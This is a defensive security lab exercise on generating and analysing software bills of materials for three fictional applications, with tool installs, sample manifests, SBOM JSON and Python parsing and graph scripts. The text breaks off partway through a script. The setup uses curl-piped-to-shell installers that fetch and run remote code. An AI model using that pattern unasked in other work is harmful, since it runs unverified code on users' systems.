Lab 31: SBOM Analysis & Supply Chain Security¶
Chapter: 24 — Supply Chain Attacks | 54 — SBOM Operations | 55 — Threat Modeling Operations Difficulty: ⭐⭐⭐⭐☆ Advanced Estimated Time: 4 hours Prerequisites: Chapter 24, Chapter 54, Chapter 55, familiarity with npm/pip/Maven package ecosystems, basic Python scripting, GitHub Actions fundamentals
Overview¶
In this lab you will:
- Generate SBOMs across multiple package ecosystems using Syft, Trivy, and cdxgen — producing both SPDX 2.3 and CycloneDX 1.5 output formats and comparing their structure, completeness, and interoperability
- Parse and analyze SBOMs programmatically with Python scripts — building dependency trees, identifying transitive dependencies, and computing depth/breadth metrics that reveal hidden risk concentrations
- Correlate SBOM components against vulnerability databases including OSV, NVD, and GitHub Advisory Database — mapping CVEs to specific components, calculating EPSS scores, and constructing a risk priority matrix
- Detect malicious package indicators including typosquatting, dependency confusion, metadata anomalies, and suspicious install scripts — applying detection patterns from Phylum and Socket.dev research
- Audit license compliance by extracting license data from SBOMs — identifying copyleft vs permissive conflicts, building compliance matrices, and flagging policy violations for enterprise environments
- Integrate SBOM workflows into CI/CD pipelines with GitHub Actions — automating SBOM generation, configuring Dependabot/Renovate, creating Sigstore cosign attestations, and producing VEX documents
Synthetic Data Only
All data in this lab is 100% synthetic and fictional. All IP addresses use RFC 5737 (192.0.2.x, 198.51.100.x, 203.0.113.x) or RFC 1918 (10.x, 172.16.x, 192.168.x) reserved ranges. All domains use *.example or *.example.com. All credentials are testuser/REDACTED. All CVE identifiers use the CVE-SYNTH- prefix and are entirely fictitious. All package names are fictional and do not correspond to real packages. This lab is for defensive education only — never use these techniques against systems you do not own or without explicit written authorization.
Scenario¶
You are a security engineer at Meridian Software Corp (a fictional organization). Your CISO has mandated full Software Bill of Materials (SBOM) adoption after a recent supply chain incident (see Chapter 24 — Supply Chain Attacks for background). You must:
- Generate SBOMs for three internal applications spanning npm, pip, and Maven ecosystems
- Build automated analysis pipelines that identify vulnerabilities, malicious packages, and license risks
- Integrate SBOM generation and attestation into the CI/CD pipeline
- Deliver a risk-prioritized report to the CISO within 48 hours
Environment:
| Asset | Details |
|---|---|
| SBOM Server | sbom-server.internal.example.com (10.50.1.100) |
| Artifact Registry | registry.internal.example.com (10.50.1.101) |
| CI/CD Runner | runner-01.internal.example.com (10.50.1.102) |
| NVD Mirror | nvd-mirror.internal.example.com (10.50.1.103) |
| Developer Workstation | dev-ws-001.internal.example.com (10.50.2.10) |
| GitHub Enterprise | github.internal.example.com (10.50.1.110) |
| Package Proxy | nexus.internal.example.com (10.50.1.120) |
| Auth | testuser / REDACTED |
Applications Under Analysis:
| Application | Ecosystem | Language | Description |
|---|---|---|---|
meridian-web-portal | npm | TypeScript/Node.js | Customer-facing web application |
meridian-data-pipeline | pip | Python | Internal data processing service |
meridian-api-gateway | Maven | Java | API gateway microservice |
Lab Setup¶
Prerequisites Installation¶
Tool Versions
This lab uses specific tool versions for reproducibility. Adjust version numbers as needed for your environment, but always pin versions in production pipelines.
# ── Install Syft (SBOM generator from Anchore) ──
curl -sSfL https://raw.githubusercontent.com/anchore/syft/main/install.sh | \
sh -s -- -b /usr/local/bin v1.18.1
# ── Install Trivy (Aqua Security scanner) ──
curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | \
sh -s -- -b /usr/local/bin v0.58.0
# ── Install cdxgen (OWASP CycloneDX generator) ──
npm install -g @cyclonedx/cdxgen@10.12.0
# ── Install Grype (vulnerability scanner from Anchore) ──
curl -sSfL https://raw.githubusercontent.com/anchore/grype/main/install.sh | \
sh -s -- -b /usr/local/bin v0.86.1
# ── Install cosign (Sigstore signing tool) ──
curl -sSfL https://github.com/sigstore/cosign/releases/download/v2.4.1/cosign-linux-amd64 \
-o /usr/local/bin/cosign && chmod +x /usr/local/bin/cosign
# ── Python dependencies for analysis scripts ──
pip install packageurl-python==0.15.6 \
spdx-tools==0.8.3 \
cyclonedx-python-lib==8.5.0 \
requests==2.32.3 \
networkx==3.4.2 \
matplotlib==3.9.3 \
tabulate==0.9.0
# ── Verify installations ──
syft version
trivy version
cdxgen --version
grype version
cosign version
Expected output (versions):
Create Lab Directory Structure¶
mkdir -p ~/lab31-sbom/{apps,sboms,analysis,reports,attestations,scripts,ci}
# ── Create the three sample applications ──
mkdir -p ~/lab31-sbom/apps/meridian-web-portal
mkdir -p ~/lab31-sbom/apps/meridian-data-pipeline
mkdir -p ~/lab31-sbom/apps/meridian-api-gateway
Create Sample Application Manifests¶
npm Application — meridian-web-portal¶
cat > ~/lab31-sbom/apps/meridian-web-portal/package.json << 'PACKAGE_JSON'
{
"name": "@meridian/web-portal",
"version": "3.8.2",
"description": "Meridian customer-facing web portal",
"private": true,
"dependencies": {
"express": "4.18.2",
"lodash": "4.17.21",
"jsonwebtoken": "9.0.0",
"axios": "1.6.0",
"helmet": "7.1.0",
"cors": "2.8.5",
"dotenv": "16.3.1",
"winston": "3.11.0",
"mongoose": "7.6.3",
"bcryptjs": "2.4.3",
"express-rate-limit": "7.1.4",
"compression": "1.7.4",
"cookie-parser": "1.4.6",
"express-validator": "7.0.1",
"passport": "0.7.0",
"passport-jwt": "4.0.1",
"swagger-ui-express": "5.0.0",
"uuid": "9.0.0",
"moment": "2.29.4",
"semver": "7.5.4"
},
"devDependencies": {
"jest": "29.7.0",
"eslint": "8.53.0",
"nodemon": "3.0.1",
"typescript": "5.2.2",
"@types/node": "20.9.0",
"@types/express": "4.17.21"
}
}
PACKAGE_JSON
pip Application — meridian-data-pipeline¶
cat > ~/lab31-sbom/apps/meridian-data-pipeline/requirements.txt << 'REQUIREMENTS'
# Meridian Data Pipeline - Production Dependencies
flask==3.0.0
requests==2.31.0
sqlalchemy==2.0.23
pandas==2.1.3
numpy==1.26.2
celery==5.3.4
redis==5.0.1
boto3==1.29.6
cryptography==41.0.5
pyyaml==6.0.1
jinja2==3.1.2
pillow==10.1.0
psycopg2-binary==2.9.9
gunicorn==21.2.0
marshmallow==3.20.1
python-dotenv==1.0.0
pydantic==2.5.2
httpx==0.25.2
aiohttp==3.9.1
lxml==4.9.3
paramiko==3.3.1
pyopenssl==23.3.0
REQUIREMENTS
cat > ~/lab31-sbom/apps/meridian-data-pipeline/setup.py << 'SETUP_PY'
from setuptools import setup, find_packages
setup(
name="meridian-data-pipeline",
version="2.4.1",
packages=find_packages(),
python_requires=">=3.11",
author="Meridian Engineering",
description="Internal data processing pipeline",
)
SETUP_PY
Maven Application — meridian-api-gateway¶
cat > ~/lab31-sbom/apps/meridian-api-gateway/pom.xml << 'POM_XML'
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0
http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>com.meridian</groupId>
<artifactId>api-gateway</artifactId>
<version>1.12.0</version>
<packaging>jar</packaging>
<name>Meridian API Gateway</name>
<description>API gateway microservice for Meridian platform</description>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>3.2.0</version>
</parent>
<properties>
<java.version>21</java.version>
<spring-cloud.version>2023.0.0</spring-cloud.version>
</properties>
<dependencies>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-security</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-actuator</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.cloud</groupId>
<artifactId>spring-cloud-starter-gateway</artifactId>
</dependency>
<dependency>
<groupId>io.jsonwebtoken</groupId>
<artifactId>jjwt-api</artifactId>
<version>0.12.3</version>
</dependency>
<dependency>
<groupId>io.jsonwebtoken</groupId>
<artifactId>jjwt-impl</artifactId>
<version>0.12.3</version>
<scope>runtime</scope>
</dependency>
<dependency>
<groupId>com.fasterxml.jackson.core</groupId>
<artifactId>jackson-databind</artifactId>
</dependency>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.22.0</version>
</dependency>
<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-text</artifactId>
<version>1.11.0</version>
</dependency>
<dependency>
<groupId>com.google.guava</groupId>
<artifactId>guava</artifactId>
<version>32.1.3-jre</version>
</dependency>
<dependency>
<groupId>org.postgresql</groupId>
<artifactId>postgresql</artifactId>
<version>42.7.1</version>
</dependency>
<dependency>
<groupId>io.micrometer</groupId>
<artifactId>micrometer-registry-prometheus</artifactId>
</dependency>
</dependencies>
<dependencyManagement>
<dependencies>
<dependency>
<groupId>org.springframework.cloud</groupId>
<artifactId>spring-cloud-dependencies</artifactId>
<version>${spring-cloud.version}</version>
<type>pom</type>
<scope>import</scope>
</dependency>
</dependencies>
</dependencyManagement>
<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
<plugin>
<groupId>org.cyclonedx</groupId>
<artifactId>cyclonedx-maven-plugin</artifactId>
<version>2.7.11</version>
</plugin>
</plugins>
</build>
</project>
POM_XML
Phase 1: SBOM Generation¶
Objective¶
Generate Software Bills of Materials for all three applications using multiple tools and output formats. Compare the resulting SBOMs for completeness and structural differences.
1.1 — Generate SBOMs with Syft¶
Syft (from Anchore) produces SBOMs by analyzing package manifests, lock files, and binary artifacts.
cd ~/lab31-sbom
# ── npm application: SPDX 2.3 JSON format ──
syft scan dir:apps/meridian-web-portal \
--output spdx-json=sboms/web-portal-syft-spdx.json \
--name "meridian-web-portal" \
--version "3.8.2"
# ── npm application: CycloneDX 1.5 JSON format ──
syft scan dir:apps/meridian-web-portal \
--output cyclonedx-json=sboms/web-portal-syft-cdx.json \
--name "meridian-web-portal" \
--version "3.8.2"
# ── pip application: both formats ──
syft scan dir:apps/meridian-data-pipeline \
--output spdx-json=sboms/data-pipeline-syft-spdx.json \
--name "meridian-data-pipeline" \
--version "2.4.1"
syft scan dir:apps/meridian-data-pipeline \
--output cyclonedx-json=sboms/data-pipeline-syft-cdx.json \
--name "meridian-data-pipeline" \
--version "2.4.1"
# ── Maven application: both formats ──
syft scan dir:apps/meridian-api-gateway \
--output spdx-json=sboms/api-gateway-syft-spdx.json \
--name "meridian-api-gateway" \
--version "1.12.0"
syft scan dir:apps/meridian-api-gateway \
--output cyclonedx-json=sboms/api-gateway-syft-cdx.json \
--name "meridian-api-gateway" \
--version "1.12.0"
Expected output (Syft scan summary for web portal):
✔ Indexed file system apps/meridian-web-portal
✔ Cataloged packages [26 packages]
├── javascript 26 packages
NAME VERSION TYPE
@types/express 4.17.21 npm
@types/node 20.9.0 npm
axios 1.6.0 npm
bcryptjs 2.4.3 npm
compression 1.7.4 npm
cookie-parser 1.4.6 npm
cors 2.8.5 npm
dotenv 16.3.1 npm
eslint 8.53.0 npm
express 4.18.2 npm
express-rate-limit 7.1.4 npm
express-validator 7.0.1 npm
helmet 7.1.0 npm
jest 29.7.0 npm
jsonwebtoken 9.0.0 npm
lodash 4.17.21 npm
moment 2.29.4 npm
mongoose 7.6.3 npm
nodemon 3.0.1 npm
passport 0.7.0 npm
passport-jwt 4.0.1 npm
semver 7.5.4 npm
swagger-ui-express 5.0.0 npm
typescript 5.2.2 npm
uuid 9.0.0 npm
winston 3.11.0 npm
1.2 — Generate SBOMs with Trivy¶
Trivy provides filesystem-mode SBOM generation with built-in vulnerability scanning.
# ── npm application ──
trivy fs apps/meridian-web-portal \
--format spdx-json \
--output sboms/web-portal-trivy-spdx.json
trivy fs apps/meridian-web-portal \
--format cyclonedx \
--output sboms/web-portal-trivy-cdx.json
# ── pip application ──
trivy fs apps/meridian-data-pipeline \
--format spdx-json \
--output sboms/data-pipeline-trivy-spdx.json
trivy fs apps/meridian-data-pipeline \
--format cyclonedx \
--output sboms/data-pipeline-trivy-cdx.json
# ── Maven application ──
trivy fs apps/meridian-api-gateway \
--format spdx-json \
--output sboms/api-gateway-trivy-spdx.json
trivy fs apps/meridian-api-gateway \
--format cyclonedx \
--output sboms/api-gateway-trivy-cdx.json
1.3 — Generate SBOMs with cdxgen¶
cdxgen (OWASP CycloneDX Generator) is ecosystem-aware and produces highly detailed CycloneDX SBOMs.
# ── npm application ──
cdxgen -t node \
-o sboms/web-portal-cdxgen-cdx.json \
apps/meridian-web-portal
# ── pip application ──
cdxgen -t python \
-o sboms/data-pipeline-cdxgen-cdx.json \
apps/meridian-data-pipeline
# ── Maven application ──
cdxgen -t java \
-o sboms/api-gateway-cdxgen-cdx.json \
apps/meridian-api-gateway
Expected output (cdxgen for web portal):
1.4 — Compare SPDX 2.3 vs CycloneDX 1.5 Format Structures¶
Format Comparison Exercise
Open two SBOM files side by side and compare their structure. Understand why organizations choose one format over the other.
Sample SPDX 2.3 JSON snippet (web portal):
{
"spdxVersion": "SPDX-2.3",
"dataLicense": "CC0-1.0",
"SPDXID": "SPDXRef-DOCUMENT",
"name": "meridian-web-portal",
"documentNamespace": "https://sbom-server.internal.example.com/spdx/meridian-web-portal-3.8.2-2026-04-12T10:00:00Z",
"creationInfo": {
"created": "2026-04-12T10:00:00Z",
"creators": [
"Tool: syft-1.18.1",
"Organization: Meridian Software Corp"
],
"licenseListVersion": "3.22"
},
"packages": [
{
"SPDXID": "SPDXRef-Package-npm-express-4.18.2",
"name": "express",
"versionInfo": "4.18.2",
"downloadLocation": "https://registry.npmjs.org/express/-/express-4.18.2.tgz",
"filesAnalyzed": false,
"supplier": "NOASSERTION",
"externalRefs": [
{
"referenceCategory": "PACKAGE-MANAGER",
"referenceType": "purl",
"referenceLocator": "pkg:npm/express@4.18.2"
}
],
"licenseConcluded": "MIT",
"licenseDeclared": "MIT",
"copyrightText": "NOASSERTION"
},
{
"SPDXID": "SPDXRef-Package-npm-lodash-4.17.21",
"name": "lodash",
"versionInfo": "4.17.21",
"downloadLocation": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz",
"filesAnalyzed": false,
"supplier": "NOASSERTION",
"externalRefs": [
{
"referenceCategory": "PACKAGE-MANAGER",
"referenceType": "purl",
"referenceLocator": "pkg:npm/lodash@4.17.21"
}
],
"licenseConcluded": "MIT",
"licenseDeclared": "MIT",
"copyrightText": "NOASSERTION"
},
{
"SPDXID": "SPDXRef-Package-npm-jsonwebtoken-9.0.0",
"name": "jsonwebtoken",
"versionInfo": "9.0.0",
"downloadLocation": "https://registry.npmjs.org/jsonwebtoken/-/jsonwebtoken-9.0.0.tgz",
"filesAnalyzed": false,
"supplier": "NOASSERTION",
"externalRefs": [
{
"referenceCategory": "PACKAGE-MANAGER",
"referenceType": "purl",
"referenceLocator": "pkg:npm/jsonwebtoken@9.0.0"
}
],
"licenseConcluded": "MIT",
"licenseDeclared": "MIT",
"copyrightText": "NOASSERTION"
}
],
"relationships": [
{
"spdxElementId": "SPDXRef-DOCUMENT",
"relatedSpdxElement": "SPDXRef-Package-npm-express-4.18.2",
"relationshipType": "DESCRIBES"
},
{
"spdxElementId": "SPDXRef-Package-npm-express-4.18.2",
"relatedSpdxElement": "SPDXRef-Package-npm-cookie-parser-1.4.6",
"relationshipType": "DEPENDS_ON"
}
]
}
Sample CycloneDX 1.5 JSON snippet (web portal):
{
"bomFormat": "CycloneDX",
"specVersion": "1.5",
"serialNumber": "urn:uuid:3e671687-395b-41f5-a30f-a58921a69b79",
"version": 1,
"metadata": {
"timestamp": "2026-04-12T10:00:00Z",
"tools": {
"components": [
{
"type": "application",
"name": "syft",
"version": "1.18.1",
"publisher": "Anchore, Inc."
}
]
},
"component": {
"type": "application",
"name": "meridian-web-portal",
"version": "3.8.2",
"bom-ref": "meridian-web-portal@3.8.2",
"purl": "pkg:npm/%40meridian/web-portal@3.8.2"
},
"manufacture": {
"name": "Meridian Software Corp",
"url": ["https://www.internal.example.com"]
}
},
"components": [
{
"type": "library",
"name": "express",
"version": "4.18.2",
"bom-ref": "pkg:npm/express@4.18.2",
"purl": "pkg:npm/express@4.18.2",
"licenses": [
{
"license": {
"id": "MIT"
}
}
],
"externalReferences": [
{
"type": "distribution",
"url": "https://registry.npmjs.org/express/-/express-4.18.2.tgz"
}
],
"properties": [
{
"name": "syft:package:type",
"value": "npm"
}
]
},
{
"type": "library",
"name": "lodash",
"version": "4.17.21",
"bom-ref": "pkg:npm/lodash@4.17.21",
"purl": "pkg:npm/lodash@4.17.21",
"licenses": [
{
"license": {
"id": "MIT"
}
}
]
},
{
"type": "library",
"name": "jsonwebtoken",
"version": "9.0.0",
"bom-ref": "pkg:npm/jsonwebtoken@9.0.0",
"purl": "pkg:npm/jsonwebtoken@9.0.0",
"licenses": [
{
"license": {
"id": "MIT"
}
}
]
}
],
"dependencies": [
{
"ref": "meridian-web-portal@3.8.2",
"dependsOn": [
"pkg:npm/express@4.18.2",
"pkg:npm/lodash@4.17.21",
"pkg:npm/jsonwebtoken@9.0.0",
"pkg:npm/axios@1.6.0",
"pkg:npm/helmet@7.1.0"
]
},
{
"ref": "pkg:npm/express@4.18.2",
"dependsOn": [
"pkg:npm/cookie-parser@1.4.6"
]
}
]
}
Key Differences — SPDX vs CycloneDX
| Feature | SPDX 2.3 | CycloneDX 1.5 |
|---|---|---|
| Primary focus | License compliance | Security/vulnerability tracking |
| Standard body | ISO/IEC 5962:2021 | OWASP |
| Relationship model | Flat with relationship array | Nested dependency tree |
| License granularity | licenseConcluded + licenseDeclared | License array with SPDX IDs |
| Vulnerability support | Via external documents | Native vulnerabilities array |
| VEX support | Separate VEX document | Inline or separate VEX |
| Government mandate | NTIA/EO 14028 compatible | NTIA/EO 14028 compatible |
| Package URL (purl) | externalRefs array | Native purl field |
| File hash support | SHA256, SHA512, MD5 | SHA256, SHA512, SHA384, MD5, BLAKE2b |
| Services support | No | Yes (services array) |
1.5 — Verify SBOM Completeness¶
# ── Count components per SBOM ──
echo "=== SBOM Component Counts ==="
echo "--- Syft ---"
echo "Web Portal (SPDX): $(python3 -c "import json; d=json.load(open('sboms/web-portal-syft-spdx.json')); print(len(d.get('packages',[])))")"
echo "Web Portal (CDX): $(python3 -c "import json; d=json.load(open('sboms/web-portal-syft-cdx.json')); print(len(d.get('components',[])))")"
echo "--- Trivy ---"
echo "Web Portal (SPDX): $(python3 -c "import json; d=json.load(open('sboms/web-portal-trivy-spdx.json')); print(len(d.get('packages',[])))")"
echo "Web Portal (CDX): $(python3 -c "import json; d=json.load(open('sboms/web-portal-trivy-cdx.json')); print(len(d.get('components',[])))")"
echo "--- cdxgen ---"
echo "Web Portal (CDX): $(python3 -c "import json; d=json.load(open('sboms/web-portal-cdxgen-cdx.json')); print(len(d.get('components',[])))")"
Expected output:
=== SBOM Component Counts ===
--- Syft ---
Web Portal (SPDX): 26
Web Portal (CDX): 26
--- Trivy ---
Web Portal (SPDX): 26
Web Portal (CDX): 26
--- cdxgen ---
Web Portal (CDX): 26
Tool Discrepancies
Different SBOM tools may report different component counts. This is expected because:
- Some tools resolve transitive dependencies from lock files while others only read manifests
- Some tools include devDependencies by default, others exclude them
- Some tools detect OS-level packages in containers while others focus on application packages
Action: Always document which tool generated each SBOM and validate against the actual package manifest.
Phase 2: Dependency Analysis¶
Objective¶
Parse SBOMs programmatically to build dependency trees, identify transitive dependencies, and compute risk-relevant metrics.
2.1 — SBOM Parsing Script¶
Create a Python script that parses both SPDX and CycloneDX SBOMs into a unified data model.
cat > ~/lab31-sbom/scripts/sbom_parser.py << 'SBOM_PARSER'
#!/usr/bin/env python3
"""
SBOM Parser — Unified parser for SPDX 2.3 and CycloneDX 1.5 JSON SBOMs.
Lab 31: SBOM Analysis & Supply Chain Security
Meridian Software Corp — Synthetic Lab Data Only
"""
import json
import sys
from dataclasses import dataclass, field
from typing import Optional
from pathlib import Path
@dataclass
class Component:
"""Unified component representation across SBOM formats."""
name: str
version: str
purl: Optional[str] = None
license: Optional[str] = None
supplier: Optional[str] = None
component_type: str = "library"
ecosystem: Optional[str] = None
direct: bool = True
dependencies: list = field(default_factory=list)
def parse_spdx(filepath: str) -> list[Component]:
"""Parse an SPDX 2.3 JSON SBOM into Component objects."""
with open(filepath, "r") as f:
data = json.load(f)
components = []
for pkg in data.get("packages", []):
# Skip the document-level package
if pkg.get("SPDXID") == "SPDXRef-DOCUMENT":
continue
purl = None
for ref in pkg.get("externalRefs", []):
if ref.get("referenceType") == "purl":
purl = ref.get("referenceLocator")
ecosystem = None
if purl:
if "pkg:npm/" in purl:
ecosystem = "npm"
elif "pkg:pypi/" in purl:
ecosystem = "pypi"
elif "pkg:maven/" in purl:
ecosystem = "maven"
comp = Component(
name=pkg.get("name", "UNKNOWN"),
version=pkg.get("versionInfo", "UNKNOWN"),
purl=purl,
license=pkg.get("licenseConcluded", "NOASSERTION"),
supplier=pkg.get("supplier", "NOASSERTION"),
ecosystem=ecosystem,
)
components.append(comp)
# Parse relationships to determine direct vs transitive
relationships = data.get("relationships", [])
direct_refs = set()
for rel in relationships:
if rel.get("relationshipType") == "DESCRIBES":
# Everything directly described by the document is direct
pass
elif rel.get("relationshipType") == "DEPENDS_ON":
direct_refs.add(rel.get("relatedSpdxElement"))
return components
def parse_cyclonedx(filepath: str) -> list[Component]:
"""Parse a CycloneDX 1.5 JSON SBOM into Component objects."""
with open(filepath, "r") as f:
data = json.load(f)
components = []
# Get direct dependency refs from the root component
root_ref = None
metadata = data.get("metadata", {})
root_component = metadata.get("component", {})
if root_component:
root_ref = root_component.get("bom-ref")
direct_refs = set()
for dep in data.get("dependencies", []):
if dep.get("ref") == root_ref:
direct_refs = set(dep.get("dependsOn", []))
for comp in data.get("components", []):
licenses = []
for lic in comp.get("licenses", []):
if "license" in lic:
licenses.append(
lic["license"].get("id", lic["license"].get("name", "UNKNOWN"))
)
elif "expression" in lic:
licenses.append(lic["expression"])
purl = comp.get("purl", "")
ecosystem = None
if purl:
if "pkg:npm/" in purl:
ecosystem = "npm"
elif "pkg:pypi/" in purl:
ecosystem = "pypi"
elif "pkg:maven/" in purl:
ecosystem = "maven"
bom_ref = comp.get("bom-ref", "")
is_direct = bom_ref in direct_refs or purl in direct_refs
component = Component(
name=comp.get("name", "UNKNOWN"),
version=comp.get("version", "UNKNOWN"),
purl=purl,
license=", ".join(licenses) if licenses else "NOASSERTION",
supplier=comp.get("publisher", "NOASSERTION"),
component_type=comp.get("type", "library"),
ecosystem=ecosystem,
direct=is_direct,
)
components.append(component)
return components
def detect_format(filepath: str) -> str:
"""Detect whether a JSON SBOM is SPDX or CycloneDX."""
with open(filepath, "r") as f:
data = json.load(f)
if "spdxVersion" in data:
return "spdx"
elif "bomFormat" in data and data["bomFormat"] == "CycloneDX":
return "cyclonedx"
else:
raise ValueError(f"Unknown SBOM format in {filepath}")
def parse_sbom(filepath: str) -> list[Component]:
"""Auto-detect format and parse an SBOM file."""
fmt = detect_format(filepath)
if fmt == "spdx":
return parse_spdx(filepath)
else:
return parse_cyclonedx(filepath)
def print_summary(components: list[Component], filepath: str):
"""Print a summary of parsed components."""
print(f"\n{'='*70}")
print(f"SBOM: {filepath}")
print(f"{'='*70}")
print(f"Total components: {len(components)}")
ecosystems = {}
licenses = {}
direct_count = 0
transitive_count = 0
for c in components:
eco = c.ecosystem or "unknown"
ecosystems[eco] = ecosystems.get(eco, 0) + 1
lic = c.license or "NOASSERTION"
licenses[lic] = licenses.get(lic, 0) + 1
if c.direct:
direct_count += 1
else:
transitive_count += 1
print(f"\nEcosystem breakdown:")
for eco, count in sorted(ecosystems.items()):
print(f" {eco}: {count}")
print(f"\nDependency type:")
print(f" Direct: {direct_count}")
print(f" Transitive: {transitive_count}")
print(f"\nLicense distribution:")
for lic, count in sorted(licenses.items(), key=lambda x: -x[1]):
print(f" {lic}: {count}")
print(f"\nComponent list:")
print(f" {'Name':<35} {'Version':<15} {'License':<20} {'Type':<10}")
print(f" {'-'*35} {'-'*15} {'-'*20} {'-'*10}")
for c in sorted(components, key=lambda x: x.name):
dep_type = "direct" if c.direct else "transitive"
print(f" {c.name:<35} {c.version:<15} {c.license:<20} {dep_type:<10}")
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: python sbom_parser.py <sbom-file.json> [sbom-file2.json ...]")
sys.exit(1)
for filepath in sys.argv[1:]:
components = parse_sbom(filepath)
print_summary(components, filepath)
SBOM_PARSER
chmod +x ~/lab31-sbom/scripts/sbom_parser.py
Run the parser:
python3 ~/lab31-sbom/scripts/sbom_parser.py \
sboms/web-portal-syft-cdx.json \
sboms/data-pipeline-syft-cdx.json \
sboms/api-gateway-syft-cdx.json
Expected output (web portal excerpt):
======================================================================
SBOM: sboms/web-portal-syft-cdx.json
======================================================================
Total components: 26
Ecosystem breakdown:
npm: 26
Dependency type:
Direct: 20
Transitive: 6
License distribution:
MIT: 22
ISC: 2
BSD-3-Clause: 1
Apache-2.0: 1
Component list:
Name Version License Type
----------------------------------- --------------- -------------------- ----------
@types/express 4.17.21 MIT direct
@types/node 20.9.0 MIT direct
axios 1.6.0 MIT direct
bcryptjs 2.4.3 MIT direct
...
2.2 — Build Dependency Tree with NetworkX¶
cat > ~/lab31-sbom/scripts/dependency_tree.py << 'DEP_TREE'
#!/usr/bin/env python3
"""
Dependency Tree Builder — Constructs and analyzes dependency graphs from SBOMs.
Lab 31: SBOM Analysis & Supply Chain Security
"""
import json
import sys
from pathlib import Path
try:
import networkx as nx
except ImportError:
print("ERROR: networkx not installed. Run: pip install networkx")
sys.exit(1)
def build_dependency_graph(sbom_path: str) -> nx.DiGraph:
"""Build a directed graph from CycloneDX dependencies."""
with open(sbom_path, "r") as f:
data = json.load(f)
G = nx.DiGraph()
# Add root node
root = data.get("metadata", {}).get("component", {})
root_ref = root.get("bom-ref", "root")
root_name = root.get("name", "root")
G.add_node(root_ref, name=root_name, version=root.get("version", "0.0.0"),
node_type="root")
# Add component nodes
component_map = {}
for comp in data.get("components", []):
ref = comp.get("bom-ref", comp.get("purl", comp["name"]))
component_map[ref] = comp
G.add_node(ref,
name=comp.get("name", "UNKNOWN"),
version=comp.get("version", "UNKNOWN"),
node_type="component")
# Add dependency edges
for dep in data.get("dependencies", []):
parent = dep.get("ref")
for child in dep.get("dependsOn", []):
if parent in G and child in G:
G.add_edge(parent, child)
elif parent in G:
# Child might be a transitive dep not in top-level components
G.add_node(child, name=child, version="unknown",
node_type="transitive")
G.add_edge(parent, child)
return G
def analyze_graph(G: nx.DiGraph, sbom_name: str):
"""Compute and display dependency metrics."""
print(f"\n{'='*70}")
print(f"Dependency Analysis: {sbom_name}")
print(f"{'='*70}")
print(f"\n--- Graph Metrics ---")
print(f"Total nodes (components): {G.number_of_nodes()}")
print(f"Total edges (dependencies): {G.number_of_edges()}")
print(f"Graph density: {nx.density(G):.4f}")
# Find root nodes (no incoming edges)
roots = [n for n in G.nodes() if G.in_degree(n) == 0]
print(f"Root components: {len(roots)}")
# Find leaf nodes (no outgoing edges)
leaves = [n for n in G.nodes() if G.out_degree(n) == 0]
print(f"Leaf components (no deps): {len(leaves)}")
# Dependency depth (longest path from root)
max_depth = 0
deepest_path = []
for root in roots:
for leaf in leaves:
try:
paths = list(nx.all_simple_paths(G, root, leaf))
for path in paths:
if len(path) > max_depth:
max_depth = len(path)
deepest_path = path
except nx.NetworkXNoPath:
continue
print(f"\n--- Depth Analysis ---")
print(f"Maximum dependency depth: {max_depth}")
if deepest_path:
print(f"Deepest path:")
for i, node in enumerate(deepest_path):
name = G.nodes[node].get("name", node)
version = G.nodes[node].get("version", "?")
indent = " " * i
connector = "└── " if i > 0 else ""
print(f" {indent}{connector}{name}@{version}")
# Breadth analysis (most depended-upon packages)
print(f"\n--- Breadth Analysis (Most Depended-Upon) ---")
in_degrees = sorted(
[(n, G.in_degree(n)) for n in G.nodes()],
key=lambda x: -x[1]
)
print(f" {'Component':<40} {'Dependents':<10}")
print(f" {'-'*40} {'-'*10}")
for node, degree in in_degrees[:10]:
name = G.nodes[node].get("name", node)
if degree > 0:
print(f" {name:<40} {degree:<10}")
# Fan-out analysis (components with most dependencies)
print(f"\n--- Fan-Out Analysis (Most Dependencies) ---")
out_degrees = sorted(
[(n, G.out_degree(n)) for n in G.nodes()],
key=lambda x: -x[1]
)
print(f" {'Component':<40} {'Dependencies':<10}")
print(f" {'-'*40} {'-'*10}")
for node, degree in out_degrees[:10]:
name = G.nodes[node].get("name", node)
if degree > 0:
print(f" {name:<40} {degree:<10}")
# Cycle detection
print(f"\n--- Cycle Detection ---")
cycles = list(nx.simple_cycles(G))
if cycles:
print(f" WARNING: {len(cycles)} dependency cycle(s) detected!")
for i, cycle in enumerate(cycles[:5]):
names = [G.nodes[n].get("name", n) for n in cycle]
print(f" Cycle {i+1}: {' -> '.join(names)} -> {names[0]}")
else:
print(f" No dependency cycles detected. ✓")
# Transitive dependency ratio
direct_deps = set()
for root in roots:
for successor in G.successors(root):
direct_deps.add(successor)
transitive = G.number_of_nodes() - len(direct_deps) - len(roots)
print(f"\n--- Dependency Ratio ---")
print(f"Direct dependencies: {len(direct_deps)}")
print(f"Transitive dependencies: {max(0, transitive)}")
if len(direct_deps) > 0:
ratio = max(0, transitive) / len(direct_deps)
print(f"Transitive/Direct ratio: {ratio:.2f}")
if ratio > 5:
print(f" ⚠ HIGH transitive ratio — supply chain risk is elevated")
elif ratio > 2:
print(f" ⚠ MODERATE transitive ratio — review critical paths")
else:
print(f" ✓ Transitive ratio is manageable")
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: python dependency_tree.py <sbom-cdx.json> [...]")
sys.exit(1)
for path in sys.argv[1:]:
G = build_dependency_graph(path)
